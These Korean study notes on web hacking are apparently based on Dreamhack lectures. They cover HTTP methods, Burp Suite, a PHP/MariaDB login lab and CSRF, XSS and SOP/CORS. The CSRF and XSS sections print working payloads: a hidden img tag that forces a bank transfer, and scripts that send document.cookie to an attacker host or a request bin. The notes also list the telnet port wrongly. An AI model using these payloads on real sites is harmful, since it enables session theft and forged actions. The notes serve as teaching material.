  • 500: 서버 내부 오류가 발생했음을 의미합니다.
• 코드 설명: 상태 코드에 대한 설명을 제공합니다. 예를 들어, 200 상태 코드는 "OK"라고 설명하며, 이는 요청이 성공적으로 처리되었음을 나타냅니다.

Header Name: Header Value

• Server 헤더는 HTTP 응답에서 서버가 사용하는 소프트웨어에 대한 정보를 제공합니다. 이 헤더는 서버의 종류와 버전, 그리고 때로는 사용 중인 운영 체제에 대한 정보를 포함할 수 있습니다.

Body

응답값을 HTML 태그를 가져와서 해석해서 보내주는 것 // 응답 본문 부분으로, 여기서는 "Google"이라는 내용이 포함되어 있습니다.

CVE(공통 취약점 및 노출, Common Vulnerabilities and Exposures)는 정보 보안 분야에서 알려진 취약점과 노출을 식별하고 관리하기 위한 표준화된 시스템입니다.

• CVE-2024-0111 (2024년의 첫번째 취약점이다. - 신고해서 취약점을 추가하는 방식인듯)
• KVE : 한국에서 만든 CVE

GET :

• GET 요청은 서버에서 리소스를 가져오는 데 사용됩니다. 일반적으로 GET 요청은 본문이 필요하지 않습니다. 요청할 URL만으로도 충분히 서버가 어떤 리소스를 반환해야 하는지를 알 수 있습니다.
• 파라미터 값이 한줄으로 나온다. (글자수 제한 255자가 있다)

https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=0&ie=utf8&query=test

POST : 

• 파라미터 값이 안보이게 숨겨져있음 (어떤 인자값이 날라가는지 보이지 않기 때문에 안전하다고 하지만 web proxy tool을 사용할 경우 전부 보이기 떄문에 공격자 입장에서는 GET과 POST는 의미가 없습니다. (글자수 제한이 없다 서버적으로 보내야할 데이터가 많으면 POST 사용)

https://search.naver.com/search.naver

• DELETE : 특정 서버에 올라가있는 자원들을 삭제할때 사용 (만약 네이버가 DELETE 를 허용해 놓고 쓰면 악의적인 사용자가 삭제를 할 수있어서 항상 허용을 차단해놔야한다.
• PUT: 지정된 리소스에 전달된 데이터 저장 // 중요해서 항상 지정설정을 해놔야한다.
• HEAD: 테스트 할때 사용
• OPTIONS: 웹서버에 어떤 메소드가 허용되어 있는지 확인할 수 있다.
• TRACE : 요청한 request를 그대로 반환

• 대중적으로 많이 사용되는 PORT number

HTTP 80

HTTPS 443

FTP 21

telnet : 24

SSH 22

SMTP: 25

Query String : 프로그램과 쿼리스트링의 구분자는 ‘?’ 이다.

field :  파라미터 (인자)

value : 파라미터 값 (인자값)

& : 각 변수의 구분자

URL encoding : 플레인 텍스트와 똑같다 (툴을 이용하면 그냥 풀림) 암호화가 아니다.

형태는 % 나 + 으로 되어있음 → 인코딩, 디코딩 검색해서 그냥 풀 수 있다.

• Base64 또한 encoding 이랑 똑같음 암호화는 아니고 쉽게 풀림

• Server Side Script

• Client Side Script

• HTML 문서와 트리 구조

• Cookie & Session

실습(1) // 웹 프록시 툴 설치 및 활용 (Burp suite)

Web proxy tool (burp suite(대중적), fiddler … )

Window OS 기준 실습

1. 웹 브라우저에서 proxy 설정 

네트워크 및 인터넷 -> 프록시 -> 프록시 서버 편집 -> 프록시 서버 사용 ON -> 아래 세팅 값 입력

web browser에서 모든 web에 대한 요청을 burp suite로 던지게 하기 위함 / 설정을 안해주면 요청을 burp suite로 안통하고 그냥 서버쪽으로 보내버린다. (최근 버젼에서는 Burp suite 자체 브라우저를 사용하면 프록시 설정을 안해줘도 됌)

   2. burp suite 세팅

 Proxy → Options -> Intercept Server Responses → intercept responses based on the following rules TICK (서버에 응답값을 받는 설정)→ 인터셉트 on 하고 브라우저를 열면 인터셉트 시작

 forward을 누르면서 순차적으로 요청값을 검사 또는 수정할 수 있다.

요청이 완전히 다 끝날 때까지 forward 버튼을 누르면 브라우저가 정상적으로 열리는 것을 확인 할 수 있음.

실습(2) // 웹 프록시 툴 설치 및 활용 (VMware-player-full, MobaXterm_Installer_v23.0)

가상머신 : VMware(무료), Virtual box(무료), Pararell(유료)

Linux : CentOS

원격 데스크톱 클라이언트 : MobaXterm

• CentOS(센토스)는 오픈 소스 리눅스 배포판으로, Red Hat Enterprise Linux(RHEL)를 기반
• MobaXterm은 직관적인 인터페이스를 제공하여, 초보자도 쉽게 사용할 수 있습니다. 복잡한 설정 없이도 빠르게 원격 서버에 접속할 수 있습니다. 또한 MobaXterm에서 Unix/Linux 명령어를 사용할 수 있어, CentOS 서버에서 직접 명령어를 실행하고 결과를 확인 할 수 있습니다

SETUP

VMware을 통해 Centos 실행(ID,pwd 'centos) -> 내 ip주소 찾기 'ifconfig'-> MobaXterm실행 ( session -〉 SSH -> 내 아이피 삽입) -> 정상작동 확인(ID,pwd 'centos)

**아이피가 안나올때 IP받아오는법**

centos -> manage - > virual -network 어뎁터→ 디바이스 상태 connected →네트워크커넥션 NAT

sudo su -

ifdown ens33

ifup ens33

CentOS 7 버전 리눅스에서 Kakao 서버의 외부 YUM Repository 설정

• CentOS 7에서 Kakao 서버의 외부 YUM Repository를 설정하면 소프트웨어 설치와 관리가 용이해지고, 최신 버전과 보안 패치를 쉽게 받을 수 있습니다. 이를 통해 안정적이고 효율적인 시스템 운영이 가능합니다.
• YUM(Yellowdog Updater, Modified)은 리눅스 기반 시스템에서 소프트웨어 패키지를 관리하기 위한 패키지 관리 도구입니다. 주로 Red Hat 계열의 배포판(예: Centos, Fedora, RHEL)에서 사용됩니다. YUM은 패키지 설치, 업데이트, 제거 및 의존성 관리를 자동으로 처리하여 시스템 관리의 편리함을 제공합니다.

MobaXterm command 화면에서 아래의 명령어를 입력합니다.

vi /etc/yum.repos.d/CenOS-Base.repo

CentOS7 버전 리눅스에서 KaKao 서버의 외부 YUM RCentOS 시스템에서 YUM 패키지 관리자가 사용하는 리포지토리 설정 파일을 열기 위한 것입니다. 이 파일을 수정하여 패키지 소스를 변경하거나 추가할 수 있습니다.

화면이 전환되면 I(insert) 버튼을 클릭 한 후 아래의 yum설정 메모장에서 

[base] ~~~~~~ gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7 까지 복사 -> 붙여넣기    

esc (수정 옵션에서 빠져나오기) -> :wq (저장) 합니다.

아래의 명령어를 한줄씩 삽입하여 Maria DB 와 apache 설치하기.

MariaDB는 MySQL의 오픈 소스 관계형 데이터베이스 관리 시스템(RDBMS)으로, MySQL의 포크(fork) 버전입니다. MySQL의 원래 개발자들이 MySQL의 소유권이 Oracle에 넘어간 후, MySQL의 기능을 유지하고 개선하기 위해 개발되었습니다

Apache HTTP Server(일반적으로 Apache라고 불림)는 오픈 소스 웹 서버 소프트웨어로, 전 세계에서 가장 널리 사용되는 웹 서버 중 하나입니다. Apache는 다양한 운영 체제에서 실행되며, 웹 콘텐츠를 사용자에게 제공하는 데 필요한 기능을 제공합니다.

PHP(풀 네임: PHP: Hypertext Preprocessor)는 서버 사이드 스크립트 언어로, 웹 개발에 주로 사용됩니다. 동적 웹 페이지를 생성하고 데이터베이스와 상호작용하는 데 매우 유용합니다.

(PHP 테스트를 하면 보여지는 창)

phpMyAdmin은 MySQL 및 MariaDB 데이터베이스를 관리하기 위한 오픈 소스 웹 기반 도구입니다. PHP로 작성되어 있으며, 사용자 친화적인 인터페이스를 통해 데이터베이스를 쉽게 관리할 수 있게 해줍니다.

(웹 상에서 데이터베이스 테이블을 만들거나 컬럼을 만드는것을 편하게 하기 위한 패키지 프로그램이다.)

http://192.168.x.x/phpmyadmin 접속확인

http://192.168.x.x/phpmyadmin 에서 아래와 같이 정보 입력

사용자명: root

암호: 1234

MobaXterm으로 돌아가서 아래의 명령어 삽입

systemctl enable mariadb 

systemctl enable mariadb 명령은 MariaDB 데이터베이스 서버를 시스템 부팅 시 자동으로 시작하도록 설정하는 명령입니다. 이 명령을 실행하면, MariaDB 서비스가 시스템이 부팅될 때마다 자동으로 시작됩니다.

mysql -u root -p

mysql -u root -p 명령은 MySQL 또는 MariaDB 데이터베이스에 root 사용자로 로그인하기 위한 명령입니다. 이 명령을 실행하면 비밀번호를 입력하라는 프롬프트가 나타납니다.

비밀번호 입력 1234

이제 본격적으로 database를 만들 예정

phpMyAdmin 창으로 되돌아가서 데이터베이스 -> 데이터베이스 이름 user 로 만들기

아래 사진을 보고 따라하기

• use user
• show columns from user;

아래와 같이 3개의 필드가 완성된 것을 명령어를 통해서도 확인이 가능함

삽입 버튼을 눌러서 관리자 계정을 하나 생성

관리자 계정이 잘 생성 되었는지 확인

select * from user; 

vi /var/www/html/login_check.php 명령어를 사용하여 삽입을 시도하면 글자가 깨져서 나오는 에러 발생

• download -> source -> 생성해야하는 4개의 php 파일 메모장으로 열기 -> 텍스트 전체 복사 -> 

cat > logincheck.php  -> 복사한 텍스트 붙여넣기 -> ctrl +D (저장)  4번 반복

제대로 php 파일을 생성했는지 'ls' 명령어를 통해 확인

웹브라우저에 192.168.1.136/index.php 를 입력하면 아래와 같은 창이 나와야 함

최종적으로, 설정한 관리자 아이디 비밀번호를 적고 로그인하면 아래처럼 로그인이 성공하여야 함

Cross Site Request Forgery (CSRF)  임의 이용자의 권한으로 임의 주소에 HTTP 요청을 보낼 수 있는 취약점

Example.

이용자의 계정으로 임의 금액을 송금해 금전적인 이득을 취하거나 비밀번호를 변경해 계정을 탈취하고, 관리자 계정을 공격해 공지사항 작성 등으로 혼란을 야기합니다.

CSRF 공격에 성공하기 위해서는 공격자가 작성한 악성 스크립트를 이용자가 실행해야 합니다.

 ** 위에서 말하는 악성 스크립트는 HTTP 요청을 보내는 코드

CSRF 공격 스크립트는 HTML 또는 Javascript를 통해 작성할 수 있습니다. 아래 사진 및 코드는 HTML으로 작성한 스크립트의 예시입니다.

이미지를 불러오는 img 태그를 사용하거나 웹 페이지에 입력된 양식을 전송하는 form 태그를 사용하는 방법이 있습니다. 이 두 개의 태그를 사용해 HTTP 요청을 보내면 HTTP 헤더인 Cookie에 이용자의 인증 정보가 포함됩니다.

아래 코드는 img 태그를 사용한 스크립트의 예시입니다. 해당 태그는 이미지의 크기를 줄일 수 있는 옵션을 제공합니다. 이를 활용하면 이용자에게 들키지않고 임의 페이지에 요청을 보낼 수 있습니다.

<img src='http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337' width=0px height=0px>

아래 코드는 Javascript로 작성된 스크립트의 예시입니다. 새로운 창을 띄우고, 현재 창의 주소를 옮기는 등의 행위가 가능합니다.

/* 새 창 띄우기 */
window.open('http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337');
/* 현재 창 주소 옮기기 */
location.href = 'http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337';
location.replace('http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337');

XSS와 CSRF는 스크립트를 웹 페이지에 작성해 공격한다는 점에서 매우 유사합니다. 

두 개의 취약점은 모두 클라이언트를 대상으로 하는 공격이며, 이용자가 악성 스크립트가 포함된 페이지에 접속하도록 유도해야 합니다

//차이점 

- XSS는 인증 정보인 세션 및 쿠키 탈취를 목적으로 하는 공격이며, 공격할 사이트의 오리진에서 스크립트를 실행시킵니다.

- CSRF는 이용자가 임의 페이지에 HTTP 요청을 보내는 것을 목적으로 하는 공격입니다. 또한, 공격자는 악성 스크립트가 포함된 페이지에 접근한 이용자의 권한으로 웹 서비스의 임의 기능을 실행할 수 있습니다.

Q1. 서버에서 이용자를 식별하기 위해 쿠키를 사용하고 있어야 CSRF 취약점으로 공격할 수 있다.

O

X

dreamhack web hacking 강의를 기반으로 작성되었습니다.

Cross Site Scripting (XSS) 

Cross Site Scripting (XSS)는 클라이언트사이드의 취약점 중 하나입니다.

공격자가 웹 리소스에 악성 스크립트를 삽입해서 이용자의 웹 브라우저에 해당 스크립트를 실행할 수 있습니다. 

예를 들어 XSS 취약점이 존재하는 사이트 내에 오리진 권한으로 악성 스크립트를 삽입한다면, 이용자가 악성 스크립트가 포함된 페이지를 방문하면 공격자가 임의로 삽입한 스크립트가 실행되어 쿠키 및 세션을 탈취할 수 있습니다.

XSS공격은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어졌지만, 우회하는 기술들을 이용한 XSS공격은 계속 지속되고 있습니다. 

XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생합니다.

XSS 공격에는 대표적으로 4가지 종류가 있습니다.

자바스크립트를 이용한 XSS 공격 코드 예시

<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

쿠키 및 세션 탈취 공격 코드

<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

페이지 변조 공격 코드

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>

위치 이동 공격 코드

Stored XSS

서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생

대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식

Reflected XSS

서버가 악성 스크립트가 담긴 요청을 출력할 때 발생

대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식

일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생

Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생

 따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 합니다. 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용합니다.

쿠키 탈취

memo 페이지 사용

flag 엔드포인트에서 다음과 같은 익스플로잇 코드를 입력하면, memo 엔드포인트에서 임의 이용자의 쿠키 정보를 확인할 수 있습니다.

<script>location.href = "/memo?memo=" + document.cookie;</script>

웹 서버 사용

외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수 있습니다. 외부에서 접근 가능한 웹 서버가 없다면 아래 첨부한 드림핵에서 제공하는 서비스를 사용할 수 있습니다. 해당 서비스에서 제공하는 Request Bin 기능은 이용자의 접속 기록을 저장하기 때문에 해당 정보를 확인할 수 있습니다. Request Bin 버튼을 클릭하면 랜덤한 URL이 생성되며, 해당 URL에 접속한 기록을 저장합니다.

flag 기능에서 다음과 같은 익스플로잇 코드를 입력하면, 아래와 같이 접속 기록에 포함된 FLAG를 확인할 수 있습니다.

<script>location.href = "http://RANDOMHOST.request.dreamhack.games/?memo=" + document.cookie;</script>

dreamhack web hacking 강의를 기반으로 작성되었습니다.

Same Origin Policy (SOP)

브라우저는 인증 정보로 사용될 수 있는 쿠키를 브라우저 내부에 보관합니다. 그리고 이용자가 웹 서비스에 접속할 때, 브라우저는 해당 웹 서비스에서 사용하는 인증 정보인 쿠키를 HTTP 요청에 포함시켜 전달합니다. 

브라우저는 웹 리소스를 통해 간접적으로 타 사이트에 접근할 때도 인증 정보인 쿠키를 함께 전송하는 특징을 가지고 있습니다.

이 특징 때문에 악의적인 페이지가 클라이언트의 권한을 이용해 대상 사이트에 HTTP 요청을 보내고, HTTP 응답 정보를 획득 하는 코드를 실행할 수 있습니다. 

따라서, 클라이언트 입장에서는 가져온 데이터를 악의적인 페이지에서 읽을 수 없도록 해야 합니다. 이것이 바로 브라우저의 보안 메커니즘인 동일 출처 정책 (Same Origin Policy, SOP) 입니다.

SOP는 Cross Origin이 아닌 Same Origin일 때만 정보를 읽을 수 있도록 해줍니다.

Same Origin

sameNewWindow = window.open('https://dreamhack.io/lecture');
console.log(sameNewWindow.location.href);
// 결과: https://dreamhack.io/lecture

crossNewWindow = window.open('https://theori.io');
console.log(crossNewWindow.location.href);
// 결과: Origin 오류 발생

** window.open은 새로운 창을 띄우는 함수이며, object.location.href는 객체가 가리키고 있는 URL 주소를 읽어오는 코드 입니다.

Cross Origin 데이터 읽기/쓰기

위와 같이 외부 출처에서 불러온 데이터를 읽으려고 할 때는 오류가 발생해 읽지 못합니다. 하지만 읽는 것 외에 데이터를 쓰는 것은 문제 없이 동작합니다. 즉, 아래와 같은 코드는 오류가 발생하지 않습니다.

crossNewWindow = window.open('https://theori.io');
crossNewWindow.location.href = "https://dreamhack.io";

Cross-Origin Resource Sharing (CORS)

위 경우들 외에도 웹 서비스에서 동일 출처 정책인 SOP를 완화하여 다른 출처의 데이터를 처리 해야 하는 경우도 있습니다. 예를 들어 특정 포털 사이트가 카페, 블로그, 메일 서비스를 아래의 주소로 운영하고 있다고 합시다. 각 서비스의 Host가 다르기 때문에 브라우저는 각 사이트의 오리진이 다르다고 인식합니다.

• 카페: https://cafe.dreamhack.io
• 블로그: https://blog.dreamhack.io
• 메일: https://mail.dreamhack.io
• 메인: https://dreamhack.io

이러한 환경에서, 이용자가 수신한 메일의 개수를 메인 페이지에 출력하려면, 개발자는 메인 페이지에서 메일 서비스에 관련된 리소스를 요청하도록 해야합니다. 이 때, 두 사이트는 오리진이 다르므로 SOP를 적용받지 않고 리소스를 공유할 방법이 필요합니다.

위와 같은 상황에서 자원을 공유하기 위해 사용할 수 있는 공유 방법을 교차 출처 리소스 공유 (Cross Origin Resource Sharing, CORS)라고 합니다. 교차 출처의 자원을 공유하는 방법은 CORS와 관련된 HTTP 헤더를 추가하여 전송하는 방법을 사용합니다. 이 외에도 JSON with Padding (JSONP) 방법을 통해 CORS를 대체할 수 있습니다.

교차 출처 리소스 공유 (Cross Origin Resource Sharing, CORS)는 HTTP 헤더에 기반하여 Cross Origin 간에 리소스를 공유하는 방법입니다. 발신측에서 CORS 헤더를 설정해 요청하면, 수신측에서 헤더를 구분해 정해진 규칙에 맞게 데이터를 가져갈 수 있도록 설정합니다.

dreamhack web hacking 강의를 기반으로 작성되었습니다.